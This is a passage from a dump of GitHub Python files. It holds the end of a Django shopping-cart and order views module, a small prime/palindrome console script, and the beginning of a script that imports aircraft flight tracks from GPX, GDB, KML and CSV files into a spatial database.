Goods.objects.filter(typeid=tid).filter(state=2)[0:11]\n print(3)\n # print(context['stulist'])\n \n a = Type.objects.filter()\n \n pidlist = set()\n for i in a :\n pidlist.add(i.pid)\n print(pidlist)\n tid = int(tid)\n print(tid)\n if(tid in pidlist) :\n context['stulist'] = Goods.objects.filter(typeid__in=Type.objects.only('id').filter(path__contains=','+str(tid)+',')).filter(state=2)[0:11]\n \n print(2)\n else:\n # 获取指定商品类别下的所有商品信息\n context['stulist'] = Goods.objects.filter(typeid=tid).filter(state=2)[0:11]\n print(1)\n # 如tid=1的sql:select * from myweb_goods where typeid in(select id from myweb_type where path like '%,1,%')\n print(context)\n return render(request,'myweb/list.html',context)\n\n# 商品详情\ndef detail(request,gid):\n context = loadContext(request)\n ob = Goods.objects.get(id=gid)\n ob.clicknum +=1\n ob.save()\n context['goods'] = ob\n return render(request,'myweb/detail.html',context)\ndef gwc(request):\n\tif 'shoplist' in request.session:\n\t\tpass\n\telse:\n\t\trequest.session['shoplist']={}\n\tcontext = loadContext(request)\n\treturn render(request,'myweb/gwc.html',context)\ndef gwcadd(request,gid):\n\tgoods = Goods.objects.get(id = gid)\n\tshop = goods.toDict()\n\tshop['m'] = int(request.POST['m'])\n\tif 'shoplist' in request.session:\n\t\tshoplist = request.session['shoplist']\n\telse:\n\t\tshoplist = {}\n\tif gid in shoplist:\n\t\tshoplist[gid]['m']+=shop['m']\n\telse:\n\t\tshoplist[gid]=shop\n\trequest.session['shoplist']=shoplist\n\treturn redirect(reverse('gwc'))\ndef gwcclear(request):\n\tcontext = loadContext(request)\n\trequest.session['shoplist'] = {}\n\treturn render(request,\"myweb/gwc.html\",context)\ndef gwcdel(request,gid):\n\tshoplist = request.session['shoplist']\n\tdel shoplist[gid]\n\trequest.session['shoplist'] = shoplist\n\treturn redirect(reverse('gwc'))\ndef gwcchange(request):\n\tcontext = loadContext(request)\n\tshoplist = request.session['shoplist']\n\t#获取信息\n\tshopid = request.GET['sid']\n\tnum = int(request.GET['m'])\n\tstore = Goods.objects.get(id = shopid).store\n\tprint(shopid)\n\tprint(num)\n\tif num<1:\n\t\tnum = 1\n\telse:\n\t\tif num >= store:\n\t\t\tcontext['info']='没有库存了哦,亲!'\n\t\t\tprint(context['info'])\n\t\telse:\n\t\t\tnum+=1\n\n\tshoplist[shopid]['m'] = num #更改商品数量\n\trequest.session['shoplist'] = shoplist\n\treturn render(request,\"myweb/gwc.html\",context)\ndef gwcchange1(request):\n\tcontext = loadContext(request)\n\tshoplist = request.session['shoplist']\n\t#获取信息\n\tshopid = request.GET['sid']\n\tnum = int(request.GET['m'])\n\tprint(shopid)\n\tprint(num)\n\tif num<=1:\n\t\tnum = 1\n\telse:\n\t\tnum-=1\n\tshoplist[shopid]['m'] = num #更改商品数量\n\trequest.session['shoplist'] = shoplist\n\treturn render(request,\"myweb/gwc.html\",context)\ndef dingdan(request):\n\tif 'id' not in request.POST:\n\t\treturn HttpResponse('选商品啊大哥!')\n\ttotal = 0\t\n\tprint(request.POST)\n\tval = request.POST.getlist('id')\n\tprint(val)\n\tgoodslist = {}\n\tshoplist = request.session['shoplist']\n\tfor id in val:\n\t# 计算总金额\n\t\ttotal += shoplist[id]['price']*shoplist[id]['m'] \n\t\t#累计总金额\n\t\t\t# 获取选购的商品信息\n\t\tob = Goods.objects.get(id = id)\n\t\tob.m = shoplist[id]['m'] \n\t\tgoodslist[id]=ob\n\tprint(goodslist)\t\n\t# print(val)\t\n\t# print(shoplist)\t\n\tprint(ob.m)\n\tname = request.session['user']['name']\n\tusers = Users.objects.get(name= name)\n\tcontext = loadContext(request)\n\tcontext['users']=users\n\tcontext['goodslist']=goodslist\n\trequest.session['shoplist'] = shoplist\n\tcontext['total']=total\n\t# print(context)\n\treturn render(request,\"myweb/dingdan.html\",context)\ndef dingdancf(request):\n\tif request.POST['linkman']=='':\n\t\treturn HttpResponse('写联系人!!')\n\tif request.POST['phone']=='':\n\t\treturn HttpResponse('写电话!!')\n\tif request.POST['code']=='':\n\t\treturn HttpResponse('写邮编!')\n\tif request.POST['address']=='':\n\t\treturn HttpResponse('写地址!')\n\tuser = {}\n\tuser['linkman'] = request.POST['linkman']\n\tuser['address'] = request.POST['address']\n\tuser['code'] = request.POST['code']\n\tuser['phone'] = request.POST['phone']\n\tcontext = loadContext(request)\n\tcontext['user']=user\n\ttotal = 0\t\n\tval = request.POST.getlist('sid')\n\tprint(val)\n\tgoodslist = {}\n\tshoplist = request.session['shoplist']\n\tfor id in val:\n\t# 计算总金额\n\t\ttotal += shoplist[id]['price']*shoplist[id]['m'] \n\t\t#累计总金额\n\t\t\t# 获取选购的商品信息\n\t\tob = Goods.objects.get(id = id)\n\t\tob.m = shoplist[id]['m']\n\t\tob.save() \n\t\tprint(ob)\n\t\tgoodslist[id]=ob\n\tprint(goodslist)\n\trequest.session['shoplist'] = shoplist\n\tcontext['goodslist']=goodslist\n\tcontext['total']=total\n\treturn render(request,\"myweb/dingdancf.html\",context)\ndef dingdans(request):\n\t# user = Users.objects.get(name= request.session['name'])\n\t# print(request.session['shoplist'])\n\tshoplist = request.session['shoplist']\n\tprint(shoplist)\n\tval = request.POST.getlist('sid')\n\tprint(val)\n\t# 处理用户信息\n\tuser = Users.objects.get(name = request.session['user']['name'])\n\tuser.address = request.POST['address']\n\tuser.code = request.POST['code']\n\tuser.phone = request.POST['phone']\n\tuser.save()\n\ttotal = 0\n\tfor id in val:\n\t\ttotal += shoplist[id]['price']*shoplist[id]['m']\n\t\t# 处理订单信息\n\torder = Orders()\n\torder.uid = user.id\n\torder.linkman = request.POST['linkman']\n\torder.address = request.POST['address']\n\torder.code = request.POST['code']\n\torder.phone = request.POST['phone']\n\torder.addtime = time.time()\n\torder.total = total\n\torder.status = 0\n\torder.save()\n\n\t# 处理商品信息\n\t\n\tfor id in val:\n\t\tdetail = Detail()\n\t\tdetail.orderid = order.id\n\t\tdetail.goodsid = id\n\t\tdetail.price = shoplist[id]['price']\n\t\tdetail.name = shoplist[id]['goods']\n\t\tdetail.num = shoplist[id]['m']\n\t\tdetail.save()\n\t\tm = shoplist[id]['m']\n\t\tgood = Goods.objects.get(id = id)\n\t\tgood.num += shoplist[id]['m']\n\t\tgood.store -= shoplist[id]['m']\n\t\tgood.save()\n\t\tdel shoplist[id] \n\t\tprint(m)\n\t\tprint(good.num)\n\t\tprint(good.store)\n\t\t\n\n\trequest.session['shoplist'] = shoplist\n\tcontext = loadContext(request)\n\tcontext['info'] = \"订单确认成功!\"\n\treturn render(request,\"myweb/info.html\",context)","repo_name":"july0426/xiaomi","sub_path":"myobject/myweb/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8623,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"38116454655","text":"import cmath\ndef show_menu():\n print(\"Enter 0 to chek the palindrome\")\n print(\"Enter 1 to chek is prime or not\")\n print(\"Enter 99 to Exit\")\ndef is_prime(num):\n f=1\n if num==1:\n print('not prime')\n else:\n for count in range(2,num):\n if(num%count==0):\n f=0\n if f == 1:\n print('is prime')\n else:\n print('not prime')\n\ndef is_plandrom(str):\n str2=str[::-1]\n f=1\n for x in range(0,len(str)-1):\n if str2[x]!=str[x]:\n f=0\n if f==1:\n print('is palindrome')\n else:\n print('not palindrome')\nn=2\nwhile n!=99:\n show_menu()\n n = int(input())\n if n==0:\n str=input('Enter the word')\n is_plandrom(str)\n elif n==1:\n num = int(input('Enter the number'))\n is_prime(num)\n elif n!=99:\n print('enter a correct number')\n\n\n\n\n\n","repo_name":"abdulraahmansaleh/prime-plandrom_by_Python","sub_path":"task2.py","file_name":"task2.py","file_ext":"py","file_size_in_byte":892,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"32827788142","text":"\"\"\"\r\nImport a flight track into a spatial database. Accepted file types are GPX, Garmin GDB, and CSV (that come from either GSAT, Spyder tracks, AFF, or Temsco files).\r\n\r\nUsage:\r\n import_track.py [--seg_time_diff=] [--min_point_distance=] [--registration=] [--submission_method=] [--ssl_cert_path=] [--operator_code=] [--aircraft_type=] [--force_import] [--email_credentials_txt=] [--log_file=]\r\n import_track.py --show_operators\r\n\r\nExamples:\r\n python import_track.py connection_info.txt \"T:/ResMgmt/Users/sam_h/proj/overflights/sample_data/2019.03.08_N709M_16N_4_edited.gpx\" -r N709M -o NPS\r\n python import_track.py connection_info.txt \"T:/ResMgmt/Users/sam_h/proj/overflights/sample_data/2019.03.08_N709M_16N_4_edited.gpx\" --registration N709M --operator NPS\r\n\r\nRequired parameters:\r\n connection_txt Path of a text file containing information to connect to the DB. Each line\r\n in the text file must be in the form 'variable_name; variable_value.'\r\n Required variables: username, password, ip_address, port, db_name.\r\n track_path Path of the track file to import.\r\n\r\nOptions:\r\n -h, --help Show this screen.\r\n --seg_time_diff= Minimum time in minutes between two points in a track file indicating the start of\r\n a new track segment [default: 15]\r\n -d, --min_point_distance= Minimum distance in meters between consecutive track points to determine unique\r\n vertices. Any points that are less than this distance from and have the same \r\n timestamp as the preceding point will be removed. [default: 200]\r\n -r, --registration= Tail (N-) number of the aircraft\r\n -o, --operator_code= Three digit code for the operator of the aircraft. All administrative flights\r\n should submitted with the code NPS\r\n -c, --ssl_cert_path= Path to an SSL .crt or .pem file for sending an HTTP request to registry.faa.gov to\r\n retrieve info about the aircraft\r\n -m, --submission_method= Method used for submission. This parameter should not be given when manually\r\n importing tracks. It's purpose is to distinguish manual vs. automated submissions.\r\n -t, --aircraft_type= The model name of the aircraft\r\n -f, --force_import If specified, import all data even if there are matching flight segments\r\n in the database already\r\n --email_credentials_txt= Path of a text file containing email username and password for sending\r\n -s, --show_operators Print all available operator names and codes to the console\r\n\"\"\"\r\n\r\nimport sys, os\r\nimport re\r\nimport pytz\r\nimport math\r\nimport random\r\nimport string\r\nimport pyproj\r\nimport shutil\r\nimport warnings\r\nimport subprocess\r\nimport smtplib\r\nimport chardet.universaldetector\r\nimport docopt\r\nimport requests\r\nimport bs4\r\nimport numpy as np\r\nimport pandas as pd\r\n#import gdal # this import is unused, but for some reason geopandas (shapely, actually) won't load unless gdal is imported first\r\nimport geopandas as gpd\r\nfrom datetime import datetime, timedelta\r\nfrom geoalchemy2 import Geometry, WKTElement\r\nfrom shapely.geometry import LineString as shapely_LineString, Point as shapely_Point\r\n\r\nimport db_utils\r\nimport update_aircraft_info as ainfo\r\nimport process_emails\r\nimport kml_parser\r\nfrom utils import get_cl_args\r\n\r\n\r\n# Patterns of column names for different csv sources\r\nCSV_INPUT_COLUMNS = [\r\n ['aff', ['Registration', 'Longitude', 'Latitude', 'Speed (kts)', 'Heading (True)', 'Altitude (FT MSL)', 'Fix', 'PDOP', 'HDOP', 'posnAcquiredUTC', 'posnAcquiredUTC -8', 'usageType', 'source', 'Latency (Sec)']],\r\n ['gsat', ['Asset', 'IMEI/Unit #/Device ID', 'Device', 'Positions', 'Events', 'Messages', 'Alerts']],\r\n ['gsat', ['Events', 'Date', 'Address', 'Lat/Lng', 'Speed', 'Heading', 'Altitude', 'Via']],\r\n ['spy', ['Aircraft', 'Registration', 'Track', 'Point', 'DateTime(UTC)', 'DateTime(Local)', 'Latitude', 'Latitude(degrees)', 'Latitude(minutes)', 'Latitude(seconds)', 'Latitude(decimal)', 'Longitude', 'Longitude(degrees)', 'Longitude(minutes)', 'Longitude(seconds)', 'Longitude(decimal)', 'Altitude(Feet)', 'Altitude(ft)', 'Speed(knots)', 'Bearing', 'PointType', 'Description']],\r\n ['tms', ['Serial No.', 'UTC', 'Latitude', 'HemNS', 'Longititude', 'HemEW', 'Knots', 'Heading', 'Altitude (m)', 'HDOP', 'New Conn', 'Entered', 'Event', 'ESN', 'Latitude (DDMM.MMMM)', 'Longititude (DDMM.MMMM)',\r\n 'Heading (True)', 'Server Time (PDT)']],\r\n ['foreflight', ['Pilot', 'Tail Number', 'Derived Origin', 'Start Latitude', 'Start Longitude', 'Derived Destination', 'End Latitude', 'End Longitude', 'Start Time', 'End Time', 'Total Duration', 'Total Distance', 'Initial Attitude Source', 'Device Model', 'Device Model Detailed', 'iOS Version', 'Battery Level', 'Battery State', 'GPS Source', 'Maximum Vertical Error', 'Minimum Vertical Error', 'Average Vertical Error', 'Maximum Horizontal Error', 'Minimum Horizontal Error', 'Average Horizontal Error', 'Imported From', 'Route Waypoints']]\r\n]\r\n\r\nCSV_OUTPUT_COLUMNS = {'aff': {'Registration': 'registration',\r\n 'Longitude': 'longitude',\r\n 'Latitude': 'latitude',\r\n 'Speed (kts)': 'knots',\r\n 'Heading (True)': 'heading',\r\n 'Altitude (FT MSL)': 'altitude_ft',\r\n 'posnAcquiredUTC': 'utc_datetime',\r\n 'posnAcquiredUTC -8': 'ak_datetime',\r\n 'posnAcquiredUTC (8)':'ak_datetime',\r\n 'posnAcquiredUTC 0': 'ak_datetime',\r\n 'DateTime Local': 'ak_datetime'\r\n },\r\n 'gsat': { },\r\n 'spy': {'Registration': 'registration',\r\n 'Aircraft': 'registration',\r\n 'DateTime(UTC)': 'utc_datetime',\r\n 'DateTime(Local)': 'ak_datetime',\r\n 'Latitude(decimal)': 'latitude',\r\n 'Longitude(decimal)': 'longitude',\r\n 'Altitude(Feet)': 'altitude_ft',\r\n 'Altitude(ft)': 'altitude_ft',\r\n 'Bearing': 'heading'\r\n },\r\n 'tms': {'UTC': 'utc_datetime',\r\n 'Latitude': 'latitude',\r\n 'Longititude': 'longitude',\r\n 'Longitude (DDMM.MMMM)': 'longitude',\r\n 'Longititude (DDMM.MMMM)': 'longitude',\r\n 'Latitude (DDMM.MMMM)': 'latitude',\r\n 'Knots': 'knots',\r\n 'Heading': 'heading',\r\n 'Heading (True)': 'heading'\r\n }\r\n }\r\nERROR_EMAIL_ADDRESSES = ['samuel_hooper@nps.gov']\r\n\r\n# Columns to use to verify that the file was read correctly\r\nVALIDATION_COLUMNS = pd.Series(['geometry', 'utc_datetime', 'altitude_ft', 'longitude', 'latitude', 'x_albers', 'y_albers', 'diff_m', 'diff_seconds', 'm_per_sec', 'knots', 'previous_lat', 'previous_lon', 'heading'])\r\n\r\nARCHIVE_DIR = r'\\\\inpdenaterm01\\overflights\\imported_files\\tracks'\r\n\r\nREGISTRATION_REGEX = r'(?i)N\\d{1,5}[A-Z]{0,2}'\r\n\r\nFEET_PER_METER = 3.2808399\r\nM_PER_S_TO_KNOTS = 1.94384\r\n\r\ndef calc_bearing(lat1, lon1, lat2, lon2):\r\n '''\r\n Calculate bearing from two lat/lon coordinates. Logic from https://gist.github.com/jeromer/2005586\r\n\r\n :return: integer compass bearing (between 0-360°)\r\n '''\r\n lat1_rad = math.radians(lat1)\r\n lat2_rad = math.radians(lat2)\r\n\r\n longitude_diff = math.radians(lon2 - lon1)\r\n\r\n x = math.sin(longitude_diff) * math.cos(lat2_rad)\r\n y = math.cos(lat1_rad) * math.sin(lat2_rad) - \\\r\n (math.sin(lat1_rad) * math.cos(lat2_rad) * math.cos(longitude_diff))\r\n\r\n initial_bearing = math.degrees(math.atan2(x, y))\r\n\r\n # math.atan2 returns values from -180° to + 180°, so convert to 0-360\r\n compass_bearing = (initial_bearing + 360) % 360\r\n\r\n return compass_bearing\r\n\r\n\r\ndef calc_distance_to_last_pt(gdf):\r\n\r\n #in_proj = pyproj.Proj('epsg:4326')\r\n #out_proj = pyproj.Proj('epsg:3338') # Alaska Albers Equal Area, which is pretty good at preserving distances\r\n transformer = pyproj.Transformer.from_crs('epsg:4326', 'epsg:3338')\r\n # for some reason you specify .transform() with y, x but it returns x, y\r\n gdf['x_albers'], gdf['y_albers'] = transformer.transform(gdf.latitude.values, gdf.longitude.values)#pyproj.transform(in_proj, out_proj, gdf.longitude.values, gdf.latitude.values)\r\n distance = (gdf.x_albers.diff()**2 + gdf.y_albers.diff()**2)**0.5 # distance between 2 points\r\n\r\n return distance\r\n\r\n\r\ndef read_gpx(path, seg_time_diff=15):\r\n\r\n gdf = gpd.read_file(path, layer='track_points')#, geometry='geometry')\r\n\r\n # Convert to datetime. It's almost in the right format to be read automatically except there's a T instead of a\r\n # space between the date and the time\r\n gdf['utc_datetime'] = pd.to_datetime(gdf.time)\r\n gdf = gdf.loc[~gdf.utc_datetime.isna()] # drop any points without a time. some garmin GPX files do this\r\n\r\n # Make points 3D\r\n gdf['altitude_ft'] = (gdf.ele * FEET_PER_METER).astype(int)\r\n gdf.geometry = gdf.apply(lambda row: shapely_Point(row.geometry.x, row.geometry.y, row.altitude_ft), axis=1)\r\n\r\n gdf['longitude'] = gdf.geometry.x\r\n gdf['latitude'] = gdf.geometry.y\r\n\r\n # Calculate speed and bearing because GPX files don't have it\r\n gdf.sort_values(by='utc_datetime', inplace=True)\r\n gdf['diff_m'] = calc_distance_to_last_pt(gdf)\r\n gdf['diff_seconds'] = gdf.utc_datetime.diff().dt.seconds\r\n gdf.loc[gdf.diff_seconds.isnull() | (gdf.diff_seconds == 0) | (gdf.diff_seconds > (seg_time_diff * 60)), 'diff_seconds'] = -1\r\n gdf['m_per_sec'] = gdf.diff_m / gdf.diff_seconds\r\n gdf['knots'] = (gdf.m_per_sec * M_PER_S_TO_KNOTS).fillna(-1).round().astype(int)# 1m/s == 1.94384 knots\r\n gdf.loc[(gdf.knots < 0) | gdf.knots.isnull(), 'knots'] = 0\r\n\r\n gdf['previous_lat'] = gdf.shift().latitude\r\n gdf['previous_lon'] = gdf.shift().longitude\r\n gdf['heading'] = gdf.apply(lambda row:\r\n calc_bearing(*row[['previous_lat', 'previous_lon', 'latitude', 'longitude']]),\r\n axis=1)\\\r\n .fillna(-1).round().astype(int)\r\n\r\n return gdf\r\n\r\n\r\ndef read_gdb(path, seg_time_diff=None):\r\n '''\r\n Convert GDB to GPX, then just use read_gpx() function\r\n '''\r\n\r\n stderr_path = os.path.join(os.path.dirname(path), 'stderr.txt')\r\n out_path = path.replace('.gdb', '.gpx')\r\n error_message, result_code = '', None # initialize in case there's an error before assigning within *with* block\r\n with open(stderr_path, 'wb+') as stderr:\r\n result_code = subprocess.call('gpsbabel -t -i gdb,via=1 -f \"{in_path}\" -o gpx -F \"{out_path}\"'\r\n .format(in_path=path, out_path=out_path),\r\n shell=True, stderr=stderr)\r\n stderr.seek(0)\r\n error_message = stderr.read()\r\n\r\n # Clean up the text file that contained the error message (if there was one)\r\n if os.path.isfile(stderr_path):\r\n os.remove(stderr_path)\r\n\r\n # If the error message isn't blank, the conversion failed\r\n if len(error_message) and result_code != 0:\r\n raise IOError(error_message)\r\n\r\n return read_gpx(out_path)\r\n\r\n\r\ndef parse_web_sentinel_xml(parser, seg_time_diff=15):\r\n\r\n points = []\r\n for placemark in parser.find_all('Placemark'):\r\n if placemark.find('styleUrl').text == '#waypt':\r\n if not placemark.description:\r\n raise ValueError\r\n content = {\r\n k.strip(): v.strip() for k, v in\r\n [\r\n [j for j in i.split(':', 1)]\r\n for i in placemark.description.text.split('\\n')\r\n if ':' in i\r\n ]\r\n }\r\n coordinate_el = placemark.find('coordinates')\r\n if not coordinate_el:\r\n raise ValueError\r\n coordinates = [c.strip() for c in coordinate_el.text.split(',')]\r\n content['latitude'] = float(coordinates[1])\r\n content['longitude'] = float(coordinates[0])\r\n if len(coordinates) > 2:\r\n content['altitude_ft'] = float(coordinates[2])\r\n elif 'Feet' in content:\r\n content['altitude_ft'] = float(content['Feet'])\r\n else:\r\n raise RuntimeError('No altitude value for point in KML file:\\n%s' % placemark.prettify())\r\n\r\n if 'Knots' in content:\r\n content['knots'] = float(content['Knots'])\r\n content['utc_datetime'] = pd.to_datetime(content['UTC'])\r\n\r\n points.append(content)\r\n\r\n df = pd.DataFrame(points).sort_values('utc_datetime')\r\n geometry = df.apply(lambda row: shapely_Point(row.longitude, row.latitude, row.altitude_ft), axis=1)\r\n gdf = gpd.GeoDataFrame(df, geometry=geometry)\r\n gdf['diff_m'] = calc_distance_to_last_pt(gdf)\r\n gdf['diff_seconds'] = gdf.utc_datetime.diff().dt.seconds\r\n gdf.loc[gdf.diff_seconds.isnull() | (gdf.diff_seconds == 0) | (gdf.diff_seconds > (seg_time_diff * 60)), 'diff_seconds'] = -1\r\n gdf['m_per_sec'] = gdf.diff_m / gdf.diff_seconds\r\n if 'knots' not in gdf:\r\n gdf['knots'] = (gdf.m_per_sec * M_PER_S_TO_KNOTS).fillna(-1).round().astype(int)# 1m/s == 1.94384 knots\r\n gdf.loc[(gdf.knots < 0) | gdf.knots.isnull(), 'knots'] = 0\r\n\r\n gdf['previous_lat'] = gdf.shift().latitude\r\n gdf['previous_lon'] = gdf.shift().longitude\r\n gdf['heading'] = gdf.apply(lambda row:\r\n calc_bearing(*row[['previous_lat', 'previous_lon', 'latitude', 'longitude']]),\r\n axis=1)\\\r\n .fillna(-1).round().astype(int)\r\n\r\n return gdf\r\n\r\n\r\ndef parse_inreach_xml(parser, seg_time_diff=15):\r\n\r\n points = []\r\n for placemark in parser.find_all('Placemark'):\r\n if placemark.find('kml:Point'):\r\n points.append({d['name']: d.find('value').text for d in placemark.find_all('kml:Data') if d.find('value')})\r\n\r\n df = pd.DataFrame(points)\r\n\r\n df['ak_datetime'] = pd.to_datetime(df['Time'])\r\n df['utc_datetime'] = pd.to_datetime(df['Time UTC'])\r\n df = df.sort_values('ak_datetime') \\\r\n .loc[df.Event.str.lower().str.contains('tracking')]\\\r\n .rename(columns={c: c.lower().replace(' ', '_') for c in df.columns})\r\n\r\n\r\n # Search for registration because with an InReach, it seems particularly likely that multiple aircraft might be\r\n # included in the same file\r\n for c in df.columns:\r\n registration = df[c].astype(str).str.extract(f'({REGISTRATION_REGEX})').squeeze().str.upper().fillna(False)\r\n if registration.all():\r\n df['registration'] = registration\r\n break\r\n\r\n if not (df.spatialrefsystem.dropna() == 'WGS84').all():\r\n raise RuntimeError('Not all coordinates in WGS84')\r\n\r\n df.longitude = df.longitude.astype(float)\r\n df.latitude = df.latitude.astype(float)\r\n df['altitude_ft'] = df.elevation.str.extract(r'(\\d*\\.\\d*)').astype(float) * FEET_PER_METER\r\n\r\n geometry = df.apply(lambda row: shapely_Point(row.longitude, row.latitude, row.altitude_ft), axis=1)\r\n gdf = gpd.GeoDataFrame(df, geometry=geometry)\r\n gdf['diff_m'] = calc_distance_to_last_pt(gdf)\r\n gdf['diff_seconds'] = gdf.utc_datetime.diff().dt.seconds\r\n gdf.loc[gdf.diff_seconds.isnull() | (gdf.diff_seconds == 0) | (gdf.diff_seconds > (seg_time_diff * 60)), 'diff_seconds'] = -1\r\n gdf['m_per_sec'] = gdf.diff_m / gdf.diff_seconds\r\n if 'knots' not in gdf:\r\n gdf['knots'] = (gdf.m_per_sec * M_PER_S_TO_KNOTS).fillna(-1).round().astype(int)# 1m/s == 1.94384 knots\r\n gdf.loc[(gdf.knots < 0) | gdf.knots.isnull(), 'knots'] = 0\r\n\r\n gdf['previous_lat'] = gdf.shift().latitude\r\n gdf['previous_lon'] = gdf.shift().longitude\r\n gdf['heading'] = gdf.apply(lambda row:\r\n calc_bearing(*row[['previous_lat', 'previous_lon', 'latitude', 'longitude']]),\r\n axis=1)\\\r\n .fillna(-1).round().astype(int)\r\n\r\n return gdf\r\n\r\n\r\ndef parse_flightradar_xml(parser, seg_time_diff):\r\n points = []\r\n placemarks = parser.find('Folder').find('name', text='Route').find_next_siblings('Placemark')\r\n for placemark_ in placemarks:\r\n key_tags = bs4.BeautifulSoup(placemark_.description.text, 'xml').select('span > b')\r\n content = {tag.text.strip(': '): tag.parent.find_next_sibling('span').text.strip() for tag in key_tags}\r\n\r\n content['utc_datetime'] = pd.to_datetime(placemark_.select_one('TimeStamp > when').text)\r\n point = placemark_.find('Point')\r\n altitude_mode = point.find('altitudeMode').text \r\n if not altitude_mode == 'absolute':\r\n raise RuntimeError(f'Altitude mode for this KML is {altitude_mode}, not absolute. Cannot determine actual altitude')\r\n longitude, latitude, altitude = [c.strip() for c in point.find('coordinates').text.split(',')]\r\n content['longitude'] = float(longitude)\r\n content['latitude'] = float(latitude)\r\n content['altitude_m'] = float(altitude)\r\n \r\n if 'Speed' in content:\r\n try:\r\n content['knots'] = float(re.match('\\d*', content['Speed']).group()[0])\r\n except:\r\n pass\r\n \r\n if 'Heading' in content:\r\n try:\r\n content['heading'] = float(re.match('\\d*', content['Heading']).group()[0])\r\n except:\r\n pass\r\n points.append(content)\r\n\r\n df = pd.DataFrame(points)\r\n df['altitude_ft'] = df.altitude_m * FEET_PER_METER\r\n geometry = df.apply(lambda row: shapely_Point(row.longitude, row.latitude, row.altitude_ft), axis=1)\r\n gdf = gpd.GeoDataFrame(df, geometry=geometry)\r\n\r\n gdf['diff_m'] = calc_distance_to_last_pt(gdf)\r\n gdf['diff_seconds'] = gdf.utc_datetime.diff().dt.seconds\r\n gdf.loc[gdf.diff_seconds.isnull() | (gdf.diff_seconds == 0) | (gdf.diff_seconds > (seg_time_diff * 60)), 'diff_seconds'] = -1\r\n gdf['m_per_sec'] = gdf.diff_m / gdf.diff_seconds\r\n if 'knots' not in gdf:\r\n gdf['knots'] = (gdf.m_per_sec * M_PER_S_TO_KNOTS).fillna(-1).round().astype(int)# 1m/s == 1.94384 knots\r\n gdf.loc[(gdf.knots < 0) | gdf.knots.isnull(), 'knots'] = 0\r\n\r\n gdf['previous_lat'] = gdf.shift().latitude\r\n gdf['previous_lon'] = gdf.shift().longitude\r\n\r\n return gdf\r\n\r\n\r\ndef read_kml(path, seg_time_diff=15):\r\n '''\r\n KMLs come in three accepted variants: Foreflight, FlightRadar, and Web Sentinel. If the file is of the Foreflight variant, convert KML to GPX, then just use read_gpx() function. Otherwise, parse the file and convert directly to a GeoDataframe.\r\n KML formats are:\r\n 1. Foreflight:\r\n \r\n #trackStyle\r\n \r\n 2019-11-17T18:45:59.015Z\r\n -147.85804607913613 64.80618080143059 126.2699673929132\r\n ...\r\n \r\n \r\n\r\n 2. Web Sentinel:\r\n \r\n #waypt\r\n \r\n UTC: Wed Jun 10 18:37:00 PDT 2020\r\n Lat: 63.73285333 N\r\n Lon: -148.91178833 E\r\n Knots: 0\r\n Track: 356\r\n Feet: 1738.845147\r\n \r\n \r\n absolute\r\n -148.91178833,63.73285333,530.0\r\n \r\n \r\n \r\n ...\r\n '''\r\n\r\n with open(path, encoding='utf-8') as f:\r\n soup = bs4.BeautifulSoup(f, 'xml')\r\n\r\n if soup.find('name', text='www.websentinel.net'):\r\n try:\r\n return parse_web_sentinel_xml(soup, seg_time_diff)\r\n except Exception as e:\r\n raise RuntimeError('Could not parse Web Sentinel KML file %s: %s' % (path, e))\r\n\r\n elif soup.find('kml:Data', attrs={'name': 'IMEI'}):\r\n try:\r\n return parse_inreach_xml(soup, seg_time_diff)\r\n except RuntimeError as e:\r\n raise RuntimeError('Could not process %s because %s' % (path, e))\r\n except Exception as e:\r\n raise RuntimeError('Could not parse InReach KML file %s: %s' % (path, e))\r\n \r\n elif soup.find(lambda tag: tag.name == 'description' and 'www.flightradar24.com' in tag.text):\r\n try:\r\n return parse_flightradar_xml(soup, seg_time_diff)\r\n except Exception as e:\r\n raise RuntimeError('Could not parse Flight Radar KML file %s: %s' % (path, e))\r\n\r\n elif soup.find('gx:Track'):\r\n try:\r\n parser = kml_parser.ForeflightKMLParser()\r\n gpx_path = parser.to_gpx(path, path.replace('.kml', '_from_kml.gpx'))\r\n except Exception as e:\r\n raise RuntimeError('Could not parse KML file %s from Foreflight format: %s' % (path, e))\r\n return read_gpx(gpx_path, seg_time_diff)\r\n \r\n else:\r\n raise RuntimeError('Could not understand KML format of file %s' % path)\r\n\r\n\r\ndef format_aff(path, encoding='ISO-8859-1', **kwargs):\r\n\r\n df = pd.read_csv(path, encoding=encoding)\r\n df.rename(columns=CSV_OUTPUT_COLUMNS['aff'], inplace=True)\r\n\r\n df.utc_datetime = pd.to_datetime(df.utc_datetime, errors='coerce')\r\n\r\n return df\r\n\r\n\r\ndef dms_to_dd(degrees, minutes, seconds, direction):\r\n ''' Convert coordinate in degrees minutes seconds to decimal degrees'''\r\n decimal_degrees = float(degrees) + float(minutes)/60 + float(seconds)/(3600)\r\n\r\n if direction in ['S', 'W']:\r\n decimal_degrees *= -1\r\n\r\n return decimal_degrees\r\n\r\n\r\ndef parse_gsat_coordinates(coordinates):\r\n '''GSAT coordinates are in the format 62°37'21.9600\"N 150°44'42.0000\"W in a single Lat/Lng field'''\r\n\r\n # Make lists of [degress, min, sec, direction] for both lat and lon\r\n lat_dms, lon_dms = [re.split('[°\\'\"]+', c) for c in coordinates.split()]\r\n\r\n return dms_to_dd(*lat_dms), dms_to_dd(*lon_dms)\r\n\r\n\r\ndef format_gsat(path, encoding='ISO-8859-1', skip_rows=0):\r\n\r\n # Try to get the registration number. It's stored in the third row, even though the metadata header is the first row\r\n try:\r\n registration = 'N' + pd.read_csv(path, encoding=encoding).loc[2, 'Asset']\r\n except:\r\n registration = ''\r\n\r\n df = pd.read_csv(path, encoding=encoding, skiprows=skip_rows)\r\n for i in range(1, 6):\r\n if 'lat/lng' in df.columns.str.lower():\r\n break\r\n df = pd.read_csv(path, encoding=encoding, skiprows=i)\r\n df.dropna(subset=['Lat/Lng'], inplace=True)\r\n\r\n #df = pd.read_csv(path, encoding='ISO-8859-1', skiprows=5)\r\n # If this didn't fail, add a registration column\r\n if registration:\r\n df['registration'] = registration\r\n\r\n # Convert coordinates to separate decimal degree lat and lon fields\r\n df['latitude'], df['longitude'] = list(zip(*df['Lat/Lng'].apply(parse_gsat_coordinates)))\r\n\r\n # Remove \"knots\" in speed field\r\n df['knots'] = df['Speed'].astype(str).str.split(' ').str[0].astype(float)\r\n\r\n # Replace degree symbol in heading. For some GSAT files, it's not there in which case pandas reads the column as\r\n # as floats. So first,\r\n # convert to 